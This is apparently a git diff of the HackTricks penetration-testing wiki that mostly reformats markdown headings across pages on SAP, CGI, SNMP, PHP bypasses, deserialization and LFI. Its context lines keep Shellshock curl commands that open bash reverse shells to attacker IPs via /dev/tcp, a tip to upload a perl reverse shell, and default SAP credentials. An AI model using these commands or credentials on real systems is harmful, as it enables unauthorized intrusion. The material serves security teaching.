query to the port **264/TCP**. -### Obtaining Firewall and Management Station Names +## Obtaining Firewall and Management Station Names Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below: @@ -21,7 +23,7 @@ Upon execution, the module attempts to contact the firewall's SecuRemote Topolog [*] Auxiliary module execution completed ``` -### Alternative Method for Hostname and ICA Name Discovery +## Alternative Method for Hostname and ICA Name Discovery Another technique involves a direct command that sends a specific query to the firewall and parses the response to extract the firewall's hostname and ICA name. The command and its structure are as follows: 
diff --git a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index fcd2c7907..29f3cd733 100644 --- a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -1,6 +1,6 @@ -{{#include ../banners/hacktricks-training.md}} +# Internet Printing Protocol -# Internet Printing Protocol \(IPP\) +{{#include ../banners/hacktricks-training.md}} The **Internet Printing Protocol (IPP)**, as specified in **RFC2910** and **RFC2911**, serves as a foundation for printing over the internet. Its capability to be extended is showcased by developments like **IPP Everywhere**, which aims to standardize mobile and cloud printing, and the introduction of extensions for **3D printing**. diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 924502f45..1a4769092 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -1,14 +1,16 @@ +# # 2301/tcp - Pentesting Compaq/HP Insight Manager + {{#include ../banners/hacktricks-training.md}} **Default Port:** 2301,2381 -# **Default passwords** +## Default passwords {{#ref}} http://www.vulnerabilityassessment.co.uk/passwordsC.htm {{#endref}} -# Config files +## Config files ```text path.properties diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index 3c7f7189d..3781e551d 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md 
@@ -1,7 +1,9 @@ +# FTP Bounce Download 2 of FTP File + {{#include ../../banners/hacktricks-training.md}} -# Resume +## Resume If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server. diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 713d58137..7d8026302 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -1,3 +1,5 @@ +# Harvesting Tickets from Linux + {{#include ../../banners/hacktricks-training.md}} ### Credential Storage in Linux diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md index 5beadffb1..b598d269b 100644 --- a/src/network-services-pentesting/pentesting-modbus.md +++ b/src/network-services-pentesting/pentesting-modbus.md @@ -1,7 +1,9 @@ +# # 502/tcp - Pentesting Modbus Protocol + {{#include ../banners/hacktricks-training.md}} -# Basic Information +## Basic Information In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. @@ -12,7 +14,7 @@ PORT STATE SERVICE 502/tcp open modbus ``` -# Enumeration +## Enumeration ```bash nmap --script modbus-discover -p 502 diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md index 84f4d943f..3d33b1131 100644 --- a/src/network-services-pentesting/pentesting-sap.md +++ b/src/network-services-pentesting/pentesting-sap.md 
@@ -1,7 +1,9 @@ +# Pentesting SAP + {{#include ../banners/hacktricks-training.md}} -# Introduction about SAP +## Introduction about SAP SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company. SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management. @@ -16,7 +18,7 @@ You’d be surprised if you knew how often these **passwords aren’t changed in Try to get access to the shell of any server using username <SID>adm. Bruteforcing can help, whoever there can be Account Lockout mechanism. -# Discovery +## Discovery > Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3! @@ -64,7 +66,7 @@ msf auxiliary(sap_service_discovery) > run [*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101' ``` -## Testing the Thick Client / SAP GUI +### Testing the Thick Client / SAP GUI Here is the command to connect to SAP GUI `sapgui ` @@ -133,7 +135,7 @@ BWDEVELOPER:Down1oad:001 - Check if you can execute system commands / run scripts in the client. - Check if you can do XSS on BAPI Explorer -# Testing the web interface +## Testing the web interface - Crawl the URLs \(see discovery phase\). - Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like: 
@@ -182,13 +184,13 @@ BWDEVELOPER:Down1oad:001 ``` -# Configuration Parameters +## Configuration Parameters If you have correct login details during the pentest or you have managed to login to SAP GUI using basic credentials, you are able to check the parameter values. Many basic and custom configuration parameter values ​​are considered vulnerabilities. You can check parameter values ​​both manually and automatically, using scripts (e.g. [SAP Parameter Validator](https://github.com/damianStrojek/SAPPV)). -## Manual Parameter Checking +### Manual Parameter Checking By navigating to Transaction Code `RSPFPAR`, you can query different parameters and look up their values. @@ -227,7 +229,7 @@ For example, if gw/reg_no_conn_info is set to less than 255 (`<255`), the | `snc/enable` | `0` | Enables or disables Secure Network Communication (SNC). | | `ucon/rfc/active` | `0` | Activates or deactivates UCON (Unified Connectivity) RFCs. | -## Script for Parameter Checking +### Script for Parameter Checking Due to the number of parameters, it is also possible to export all of them to an .XML file and use the script [SAPPV (SAP Parameter Validator)](https://github.com/damianStrojek/SAPPV), which will check all the above-mentioned parameters and print them values ​​with appropriate distinction. @@ -261,7 +263,7 @@ Vulnerability: "SAP Parameter Misconfiguration: bdc/bdel_auth_check" [...] ``` -# Attack! +## Attack! - Check if it runs on old servers or technologies like Windows 2000. - Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits: @@ -363,7 +365,7 @@ bizploit/plugins> back bizploit> start ``` -# Other Useful Tools for Testing +## Other Useful Tools for Testing - [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security - [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments 
diff --git a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md index 2af97c5cc..da0ba2c15 100644 --- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md +++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md @@ -1,7 +1,7 @@ -{{#include ../../banners/hacktricks-training.md}} - # SNMP RCE +{{#include ../../banners/hacktricks-training.md}} + SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server. ## Extending Services with Additional Commands diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md index 9f62440af..19eb898d5 100644 --- a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md +++ b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md @@ -1,3 +1,5 @@ +# AEM (Adobe Experience Manager) Pentesting + {{#include ../../banners/hacktricks-training.md}} Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker) diff --git a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md index f288873e3..89777cff6 100644 --- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md @@ -1,3 +1,5 @@ +# Artifactory Hacking Guide + {{#include ../../banners/hacktricks-training.md}} **Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory) 
diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 49ea51881..a3625f877 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -1,12 +1,14 @@ +# CGI Pentesting + {{#include ../../banners/hacktricks-training.md}} -# Information +## Information The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \(`chmod +x`\) and **access** the reverse shell **from the web browser** to execute it. In order to test for **CGI vulns** it's recommended to use `nikto -C all` \(and all the plugins\) -# **ShellShock** +## **ShellShock** **ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system. @@ -14,7 +16,7 @@ Exploiting this vulnerability the **page could throw an error**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi_mod** \(with cgi folder\) or using **nikto**. -## **Test** +### **Test** Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them. 
@@ -41,7 +43,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http: python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` -## Exploit +### Exploit ```bash #Bind Shell @@ -57,13 +59,13 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > run ``` -# **Proxy \(MitM to Web server requests\)** +## **Proxy \(MitM to Web server requests\)** CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. -# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) +## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) Basically if cgi is active and php is "old" \(<5.3.12 / < 5.4.2\) you can execute code. In order t exploit this vulnerability you need to access some PHP file of the web server without sending parameters \(specially without sending the character "="\). diff --git a/src/network-services-pentesting/pentesting-web/golang.md b/src/network-services-pentesting/pentesting-web/golang.md index 26eb1eeda..6b8d5aa30 100644 --- a/src/network-services-pentesting/pentesting-web/golang.md +++ b/src/network-services-pentesting/pentesting-web/golang.md @@ -1,3 +1,5 @@ +# GoLang HTTP CONNECT Method + {{#include ../../banners/hacktricks-training.md}} ## CONNECT method diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md index e1f35255a..a44460e2a 100644 
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md @@ -1,3 +1,5 @@ +# Disable Functions Bypass - dl Function + {{#include ../../../../banners/hacktricks-training.md}} **Important note:** diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index 4bf7a6ee0..68e1ff348 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -1,6 +1,7 @@ +# Imagick <= 3.3.0 PHP >= 5.4 Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# Imagick <= 3.3.0 PHP >= 5.4 Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md index ef4568d94..172a3fe1e 100644 
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md @@ -1,6 +1,7 @@ +# mod_cgi + {{#include ../../../../banners/hacktricks-training.md}} -# mod_cgi From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md index 332701786..ac9e564dd 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md @@ -1,6 +1,7 @@ +# PHP 4 >= 4.2.0, PHP 5 pcntl_exec + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 4 >= 4.2.0, PHP 5 pcntl_exec From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) 
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md index 8139e085d..87926c202 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md @@ -1,6 +1,7 @@ +# PHP 5.2 - FOpen Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2 - FOpen Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md index 275a89fcb..58151ae5f 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md 
@@ -1,6 +1,7 @@ +# PHP 5.2.3 - Win32std ext Protections Bypass + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.3 - Win32std ext Protections Bypass From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md index a67293d7a..47c3814e4 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md @@ -1,6 +1,7 @@ +# PHP 5.2.4 and 5.2.5 PHP cURL + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.4 and 5.2.5 PHP cURL From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md index 5de0479fa..349e27949 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md 
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md @@ -1,6 +1,7 @@ +# PHP <= 5.2.9 on windows + {{#include ../../../../banners/hacktricks-training.md}} -# PHP <= 5.2.9 on windows From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index d2d36c32d..102dcb799 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -1,6 +1,7 @@ +# PHP Perl Extension Safe_mode Bypass Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP Perl Extension Safe_mode Bypass Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) 
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md index c51679b30..514431938 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md @@ -1,6 +1,6 @@ -{{#include ../../../../banners/hacktricks-training.md}} +# PHP safe_mode bypass via proc_open and custom environment Exploit -# PHP safe_mode bypass via proc_open\(\) and custom environment Exploit +{{#include ../../../../banners/hacktricks-training.md}} From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md index 5c0d4445f..9fa7124e8 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md 
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md @@ -1,7 +1,7 @@ -{{#include ../../../../banners/hacktricks-training.md}} - # via mem +{{#include ../../../../banners/hacktricks-training.md}} + From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md index e8a256123..545ac259d 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md @@ -1,6 +1,7 @@ +# PHP 5.2.4 ionCube extension Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.4 ionCube extension Exploit ```php @@ -9,7 +11,7 @@ msf> use auxiliary/scanner/vmware/esx_fingerprint msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump ``` -# Bruteforce +## Bruteforce ```bash msf> auxiliary/scanner/vmware/vmware_http_login diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md index cdbe1d288..3ae0bc0a3 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md 
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md @@ -1,3 +1,5 @@ +# CSP Bypass via Self + Unsafe Inline with Iframes + {{#include ../../banners/hacktricks-training.md}} A configuration such as: @@ -10,7 +12,7 @@ Prohibits usage of any functions that execute code transmitted as a string. For Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS -### Via Text & Images +## Via Text & Images It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them: @@ -23,7 +25,7 @@ script.src = "//example.com/csp.js" window.frames[0].document.head.appendChild(script) ``` -### Via Errors +## Via Errors Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions: diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 67d19aa86..d072dffd3 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md 
@@ -767,7 +767,7 @@ Take a look to [this POST about **how to try to exploit the \_\_ViewState parame To mitigate the risks associated with deserialization in .Net: - **Avoid allowing data streams to define their object types.** Utilize `DataContractSerializer` or `XmlSerializer` when possible. -- **For `JSON.Net`, set `TypeNameHandling` to `None`:** %%%TypeNameHandling = TypeNameHandling.None%%% +- **For `JSON.Net`, set `TypeNameHandling` to `None`:** `TypeNameHandling = TypeNameHandling.None` - **Avoid using `JavaScriptSerializer` with a `JavaScriptTypeResolver`.** - **Limit the types that can be deserialized**, understanding the inherent risks with .Net types, such as `System.IO.FileInfo`, which can modify server files' properties, potentially leading to denial of service attacks. - **Be cautious with types having risky properties**, like `System.ComponentModel.DataAnnotations.ValidationException` with its `Value` property, which can be exploited. diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md index 0ad3bf5f8..28ed22a5a 100644 --- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md +++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md 
@@ -1,8 +1,10 @@ +# Basic Java Deserialization with ObjectInputStream readObject + {{#include ../../banners/hacktricks-training.md}} In this POST it's going to be explained an example using `java.io.Serializable`. -# Serializable +## Serializable The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). @@ -82,7 +84,7 @@ public class TestDeserialization { } ``` -## Conclusion +### Conclusion As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**. diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md index 6fc4df6ae..411e75f35 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md @@ -1,3 +1,5 @@ +# Exploiting __VIEWSTATE Knowing the Secret + {{#include ../../banners/hacktricks-training.md}} **Check the amazing post from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) diff --git a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md index 5f80ff684..9ac13a058 100644 --- a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md 
+++ b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md @@ -1,3 +1,5 @@ +# Java JSF ViewState Deserialization + {{#include ../../banners/hacktricks-training.md}} Check the posts: diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md index 292132550..6994d0027 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md @@ -1,3 +1,5 @@ +# LFI to RCE via PHPInfo + {{#include ../../banners/hacktricks-training.md}} To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file_uploads = on" and the server has to be able to write in the "/tmp" directory.** diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md index 726de4d97..ea0efbca2 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md @@ -1,3 +1,5 @@ +# LFI to RCE via Temporary File Uploads + {{#include ../../banners/hacktricks-training.md}} **Check the full details of this technique in [https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf](https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf)** @@ -11,7 +13,7 @@ When a **PHP** engine receives a **POST request** containing files formatted acc The challenge for unauthorized access lies in predicting the temporary file's name, which is intentionally randomized. -#### Exploitation on Windows Systems +### Exploitation on Windows Systems On Windows, PHP generates temporary file names using the `GetTempFileName` function, resulting in a pattern like `\
.TMP`. Notably:
 
@@ -27,7 +29,7 @@ http://site/vuln.php?inc=c:\windows\temp\php<<
 
 In certain situations, a more specific mask (like `php1<<` or `phpA<<`) might be required. One can systematically try these masks to discover the uploaded temporary file.
 
-#### Exploitation on GNU/Linux Systems
+### Exploitation on GNU/Linux Systems
 
 For GNU/Linux systems, the randomness in temporary file naming is robust, rendering the names neither predictable nor susceptible to brute force attacks. Further details can be found in the referenced documentation.
 
